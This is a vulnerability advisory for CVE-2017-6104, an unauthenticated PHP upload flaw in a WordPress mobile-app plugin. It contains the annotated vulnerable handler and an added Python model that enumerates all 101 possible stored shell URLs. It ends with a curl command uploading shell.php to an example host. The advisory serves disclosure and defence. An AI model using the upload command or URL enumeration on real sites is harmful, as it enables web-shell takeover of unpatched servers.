Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Vendor Contact:
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in ./zen-mobile-app-native/server/images.php does not require authentication or check that the requesting user is allowed to upload content. It also does not validate the uploaded file's type or extension, so a PHP file can be uploaded and then executed from the web-accessible images/ directory. Two further weaknesses are visible in the handler: the stored extension is $ext[1], the second dot-separated part of the client-supplied name (so shell.php.jpg is stored as .php), and the stored basename is md5(rand(100, 200)), which has only 101 possible values, so uploaded files land at predictable locations.

<?php
//header("content-type: text/html; charset=iso-8859-2");
header("Content-Type: text/html; charset=utf-8");
header("Access-Control-Allow-Origin: *");   // any origin may read the response
require_once("function.php");

	// No authentication, nonce or capability check precedes the upload.
	if ($_FILES['file']['name']) {
            if (!$_FILES['file']['error']) {
                // rand(100, 200) has only 101 outcomes: the stored name is predictable.
                $name = md5(rand(100, 200));
                // Extension is the second dot-separated part of the client name,
                // used verbatim; nothing restricts it to image types.
                $ext = explode('.', $_FILES['file']['name']);
                $filename = $name . '.' . $ext[1];
                $destination = 'images/' . $filename;
                $location = $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                // Echoes the web-accessible URL of the file just written.
                echo $plugin_url.'/server/images/' . $filename;
            }
            else {
              echo  $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
            }
    }
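Added example (not part of the advisory and not the plugin's own code): a Python model of the filename logic in server/images.php, so the two weak points in the handler, the 101-value name space from md5(rand(100, 200)) and the $ext[1] extension choice, can be checked offline. The only assumption is the example.com host used elsewhere in this advisory; no network request is made, and the client filenames at the bottom are constructed inputs.

```python
"""Model of the naming logic in zen-mobile-app-native/server/images.php.

The handler writes each upload to images/ as  md5(rand(100, 200)) . "." . $ext[1].
This module reproduces that logic so its consequences can be verified.
"""
import hashlib
from typing import List, Optional

MIN_RAND, MAX_RAND = 100, 200  # bounds hard-coded in images.php; PHP rand() is inclusive


def md5_of_int(n: int) -> str:
    """PHP's md5(rand(...)) hashes the decimal string form of the integer."""
    return hashlib.md5(str(n).encode("ascii")).hexdigest()


# Every basename the handler can ever produce: 101 entries.
POSSIBLE_BASENAMES = frozenset(md5_of_int(n) for n in range(MIN_RAND, MAX_RAND + 1))


def stored_extension(client_filename: str) -> Optional[str]:
    """Mirror of  $ext = explode('.', $name); $ext[1]  in the handler.

    Takes the SECOND dot-separated token, not the last one, so
    "shell.php.jpg" yields "php".  Returns None where PHP would read an
    undefined index (a name with no dot); the handler then appends nothing.
    """
    parts = client_filename.split(".")
    return parts[1] if len(parts) > 1 else None


def stored_filename(client_filename: str, rand_value: int) -> str:
    """Basename the handler writes for a given client name and rand() outcome."""
    ext = stored_extension(client_filename)
    return f"{md5_of_int(rand_value)}.{ext if ext is not None else ''}"


def is_possible_upload_name(basename: str) -> bool:
    """True if the stem of basename could have been produced by this handler."""
    stem = basename.split(".", 1)[0]
    return stem in POSSIBLE_BASENAMES


def candidate_urls(images_dir_url: str, ext: str = "php") -> List[str]:
    """All URLs a file stored with extension `ext` could be served from.

    images_dir_url is the plugin's server/images/ directory.  Because the
    name space is 101 entries, a file can be located without the echoed URL.
    """
    base = images_dir_url.rstrip("/")
    return [f"{base}/{name}.{ext}" for name in sorted(POSSIBLE_BASENAMES)]


if __name__ == "__main__":
    # Constructed client-side filenames, to show how the extension is chosen.
    for name in ("shell.php", "shell.php.jpg", "photo.jpg", "noext"):
        print(f"{name:15} -> {stored_filename(name, 150)}")
    # Hypothetical host, as used in the advisory's exploit section.
    urls = candidate_urls(
        "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images/"
    )
    print(f"{len(urls)} candidate locations, first: {urls[0]}")
    # The basename echoed in the advisory can be checked against the set:
    print(is_possible_upload_name("8d5e957f297893487bd98fa830fa6413.php"))
```

The point of the model is that the stored location is not secret: even if the echoed URL were suppressed, every upload lands at one of 101 names, and a client name of the form x.php.anything still produces a .php file.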
CVEIDs: CVE-2017-6104
Exploit: $ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"

The handler echoes the URL of the stored file:
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0